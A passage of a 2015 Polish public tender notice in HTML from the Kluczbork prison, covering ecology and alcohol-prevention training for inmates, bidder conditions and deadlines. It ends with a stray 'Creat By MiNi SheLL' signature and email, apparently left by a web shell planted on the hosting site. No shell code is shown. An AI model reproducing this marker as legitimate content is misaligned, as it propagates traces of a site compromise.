uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie ekologiczne (szkolenie kompetencyjne), którego celem jest poznanie
podstawowych zagadnień z zakresu ekologii i ochrony środowiska.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia:
- ochrona lasów i terenów zielonych,
- gospodarowanie odpadami komunalnymi i selektywnymi.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej)
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie z zakresu profilaktyki alkoholowej, którego celem jest poznanie podstawowych
zagadnień z zakresu:
- Wpływ alkoholu na organizm,
- Ryzyko związane z używaniem alkoholu,
- Droga do uzależnienia,
- Objawy uzależnienia,
- Autodiagnoza,
- Szkody zdrowotne związane z używaniem alkoholu,
- Picie szkodliwe,
- Fazy uzależnienia,
- Formy pomocy osobą uzależnionym i nadużywającym alkoholu,
- Placówki leczenia odwykowego, formy terapii.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
c) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
d) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
3. Całość przedmiotu zamówienia (IV części) należy wykonać od poniedziałku do soboty, od dnia
podpisania umowy do dnia 12 czerwca 2015 r.
Zamawiający przewiduje następujące terminy przeprowadzenia szkoleń dla poszczególnych części
zamówienia:
CZĘŚĆ I: od podpisania umowy do 10.04.2015 r.
CZĘŚĆ II: od 7.04.2015 r. do 30.04.2015 r.
CZĘŚĆ III: od 27.04.2015 r. do 22.05.2015 r.
CZĘŚĆ IV: od 18.05.2015 r. do 12.06.2015 r.
4. Liczba uczestników dla każdej z części zamówienia: 10 osadzonych (+2 rezerwowych). W przypadku nie
przystąpienia lub rezygnacji z kursu przez uczestnika, jeżeli do końca zostało nie mniej niż 80%,
zamawiający zastrzega sobie prawo do udziału uczestnika z listy rezerwowej osób zakwalifikowanych na
kurs. Wykonawcy będzie przysługiwało wynagrodzenie za faktycznie przeszkolona ilość osób. Zamawiający
zastrzega sobie prawo zmniejszenia zakresu ilościowego przedmiotu zamówienia. Zmniejszenie zakresu
będzie podstawą do proporcjonalnego zmniejszenia wynagrodzenia.
5. Wykonawca zapewnia prowadzenie zajęć przez wykwalifikowaną kadrę, posiadającą odpowiednie
wykształcenie kierunkowe.
6. Uczestnicy szkolenia kończą kurs testem sprawdzającym wiedzę z zakresu objętego szkoleniem
7. Po zakończeniu szkolenia wykonawca zobowiązany jest do wystawienia każdemu z uczestników
zaświadczenia o ukończeniu szkolenia, wg wzoru stanowiącego załącznik do Rozporządzenia Ministra
Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach
pozaszkolnych oraz certyfikatu uczestnictwa w szkoleniu opatrzonego właściwym dla Norweskiego
Mechanizmu Finansowego 2009-2014 logotypem oraz zapisem umożliwiającym identyfikację źródeł
finansowania szkolenia, przygotowanego wg własnego projektu. Koszty wydania zaświadczeń i certyfikatów
pokrywa Wykonawca.
8. Wykonawca zobowiązuje się do samodzielnego gromadzenia danych osobowych uczestników szkolenia
i przetwarzania ich zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. 2002
nr 101, poz. 926, z późn. zm.).
9. Wykonawca zobowiązany jest do umieszczania na dokumentacji szkoleniowej obowiązujących logotypów
właściwych dla Norweskiego Mechanizmu Finansowego 2009-2014 oraz zapisu umożliwiającego
identyfikację źródeł finansowania.
10. Wykonawca zobowiązuje się do prowadzenia zgodnie z zapisami § 75 ust. 5 rozporządzenia Ministra
Pracy i Polityki Społecznej z dnia 12 grudnia 2011 roku w sprawie
standardów i warunków prowadzenia usług rynku pracy, (Dz. U. z 2011 r. nr 279, poz. 1641) dokumentacji
przebiegu szkolenia, w szczególności:
a) dziennika zajęć edukacyjnych, zawierającego wymiar godzin i tematy zajęć edukacyjnych oraz listę
obecności zawierającą: imię, nazwisko i podpis uczestnika.
b) rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.
11. Do obowiązków Wykonawcy należy również:
a) przedstawienie do akceptacji szczegółowego harmonogramu realizacji zajęć, programu szkolenia oraz
wzoru zaświadczenia potwierdzającego ukończenie szkolenia wraz ze wskazaniem planowanego terminu
rozpoczęcia i zakończenia szkolenia, najpóźniej w dniu podpisania umowy. Harmonogram, program zajęć
oraz wzór zaświadczenia wymagają zatwierdzenia.
Program szkolenia powinien zawierać w szczególności:
- nazwę formy kształcenia,
- czas trwania, liczbę godzin kształcenia i sposób jego organizacji,
- cele kształcenia i sposoby ich osiągania, z uwzględnieniem możliwości indywidualizacji pracy uczestników
kształcenia w innych formach pozaszkolnych, w zależności od ich potrzeb i możliwości,
- plan nauczania określający nazwę zajęć oraz ich wymiar,
- treści nauczania w zakresie poszczególnych zajęć,
- opis efektów kształcenia,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób i formę zaliczenia.
b) bieżące sprawowanie nadzoru nad frekwencją uczestników szkolenia poprzez sporządzanie imiennej listy
obecności słuchaczy opatrzonej ich podpisami koloru niebieskiego lub zielonego.
12. Zamawiający zastrzega sobie prawo do sprawowania nadzoru nad przebiegiem i obsługą
organizowanego szkolenia przez cały okres jego trwania.
13. Szkolenie winno być przeprowadzone zgodnie z obowiązującymi przepisami krajowymi w tym
w szczególności z rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r w sprawie
kształcenia ustawicznego w formach pozaszkolnych oraz rozporządzeniem
Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia
nauczania w zakładach karnych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
wykonawcy, którzy spełniają warunki dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa
nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4) sytuacji ekonomicznej i finansowej.
2. W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek udziału w postępowaniu
dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w
okolicznościach, o których stanowi art. 24 ust. 1 ustawy Prawo zamówień publicznych.
3. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia
publicznego, każdy z warunków określonych w pkt. od 1. ppkt 1) do 1. ppkt 4) winien spełniać co najmniej
jeden z tych wykonawców, albo wszyscy ci wykonawcy wspólnie. Warunek określony w pkt. 2. powinien
spełniać każdy z wykonawców samodzielnie.
4. Zamawiający oceni, czy wykonawca spełnia warunki udziału w postępowaniu określone w punkcie od 1.
ppkt 1) do 1. ppkt 4) na podstawie złożonych oświadczeń i dokumentów. Oświadczenia i dokumenty, jakie
winni złożyć wykonawcy w swojej ofercie, zostały wyszczególnione w rozdziale VIII specyfikacji.
VIII. Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu
potwierdzenia spełnienia warunków udziału w postępowaniu
1. Na potwierdzenie spełniania warunków udziału w postępowaniu, wykonawca składa oświadczenia
i dokumenty, które należy dołączyć do oferty.
2. Wykonawca zobow i ą zany jest o ś wiadczy ć , ż e spełnia warunki, o których stanowi art. 22 ust. 1 ustawy
dotycz ą ce :
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa
nakładają obowiązek ich posiadania (warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie na
formularzu, którego wzór stanowi załącznik nr 2 do specyfikacji),
2) posiadania wiedzy i doświadczenia (warunek ten zostanie spełniony, jeżeli wykonawca złoży
oświadczenie na formularzu, którego wzór stanowi załącznik nr 2 do specyfikacji),
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
(warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie na formularzu, którego wzór stanowi
załącznik nr 2 do specyfikacji),
4) sytuacji ekonomicznej i finansowej (warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie na
formularzu, którego wzór stanowi załącznik nr 2 do specyfikacji).
Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo
zamówień publicznych musi mieć formę pisemną i należy je złożyć na formularzu, którego wzór stanowi
załącznik nr 2 do specyfikacji (oryginał).
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie
zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków określonych w art. 22 ust. 1
ustawy składa, co najmniej jeden z tych wykonawców, albo wszyscy ci wykonawcy wspólnie.
3. Oprócz ww. oświadczenia wykonawca w celu wykazania braku podstaw do wykluczenia z postępowania
o udzielenie zamówienia, o których stanowi art. 24 ust. 1 ustawy zobowiązany jest złożyć oświadczenie
o braku podstaw do wykluczenia. Oświadczenie musi mieć formę pisemną i należy je złożyć na
formularzu, którego wzór stanowi załącznik nr 3 do specyfikacji (oryginał),
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie
zamówienia publicznego, dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy
z wykonawców oddzielnie.
4. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej ,
jeżeli odrębne przepisy wymagają wpisu lub ewidencji, w celu wykazania braku podstaw do wykluczenia
w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu
Strona 11
Znak sprawy: D/Kw - 220 - 02 / 15
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania
ofert;
5. Wykonawca w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia,
o którym stanowi art. 24 ust. 2 pkt 5 ustawy zobowiązany jest złożyć listę podmiotów należących do tej
samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów
(Dz. U. z 2007 r. Nr 50, poz. 331 z późn. zm.), albo informację o tym, że nie należy do grupy kapitałowej.
Informację należy złożyć na formularzu, którego wzór stanowi załącznik nr 4 do specyfikacji (oryginał).
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie
zamówienia publicznego, dokument potwierdzający, że wykonawca nie podlega wykluczeniu składa każdy
z wykonawców oddzielnie.
6. Inne dokumenty niewymienione w pkt. 2. - 5.:
1) wypełniony formularz ofertowy. Formularz ofertowy musi mieć formę pisemną i należy go złożyć na druku,
którego wzór stanowi załącznik nr 1 do specyfikacji (oryginał),
2) pełnomocnictwo, (jeżeli dotyczy).
7. Osoba upoważniona do reprezentowania wykonawcy bądź podpisywania oferty, musi działać zgodnie
z zasadami reprezentacji. Jeżeli osoba(y) podpisująca(e) ofertę działa(ją) na podstawie pełnomocnictwa, to
pełnomocnictwo musi w swej treści jednoznacznie wskazywać uprawnienie rodzajowe np. do podpisania
oferty, zawarcia umowy itp.
Pełnomocnictwo to musi zostać dołączone do oferty i winno być złożone w formie oryginału lub kopii
poświadczonej notarialnie.
8. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte
ww. dokumentach i oświadczeniach. Z ich treści w sposób jednoznaczny musi wynikać, iż wykonawca
spełnia wymienione warunki udziału w postępowaniu. Zamawiający wezwie wykonawców, którzy
w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów, lub nie złożyli pełnomocnictw,
albo, którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub, którzy
złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia
oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na
wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę
warunki udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.
Ponadto, zamawiający może wezwać wykonawców w wyznaczonym przez siebie terminie do złożenia
wyjaśnień dotyczących oświadczeń lub dokumentów.
9. Oferty wspólne.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. jako konsorcjum). W tym przypadku
ustanawiają pełnomocnika (pełnomocnictwo winno zostać dołączone do oferty) do reprezentowania ich
w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy
w sprawie zamówienia publicznego. Jeżeli oferta wykonawców zostanie wybrana, jako najkorzystniejsza,
zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej
współpracę tych wykonawców.
10. Podwykonawcy.
W przypadku powierzenia realizacji zamówienia podwykonawcom, wykonawca zobowiązany jest do
wskazania w ofercie tej części zamówienia, której realizację powierzy podwykonawcy. W przypadku braku
takiego oświadczenia, Zamawiający uzna, iż wykonawca będzie realizował zamówienie bez udziału
podwykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w III.3.1)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w III.3.1)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w III.3.1)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w III.3.1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy. 2) pełnomocnictwo, (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Kluczbork, 46-200 Kluczbork, ul. Katowicka 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2015 godzina 10:00, miejsce: Sekretariat Zakładu Karnego w Kluczborku, 46-200 Kluczbork, ul. Katowicka 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kursy szkoleniowe zostaną zorganizowane w ramach realizacji działań szkoleniowych do Modułu 1.1
Działanie na rzecz ekologii w Projekcie nr 1 pn. Realizacja szkoleń podnoszących kompetencje społecznozawodowe
więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu
zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary Programu PL 17
Norweskiego Mechanizmu Finansowego 2009-2014 pn. Wsparcie Służby Więziennej, w tym kary
nieizolacyjne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com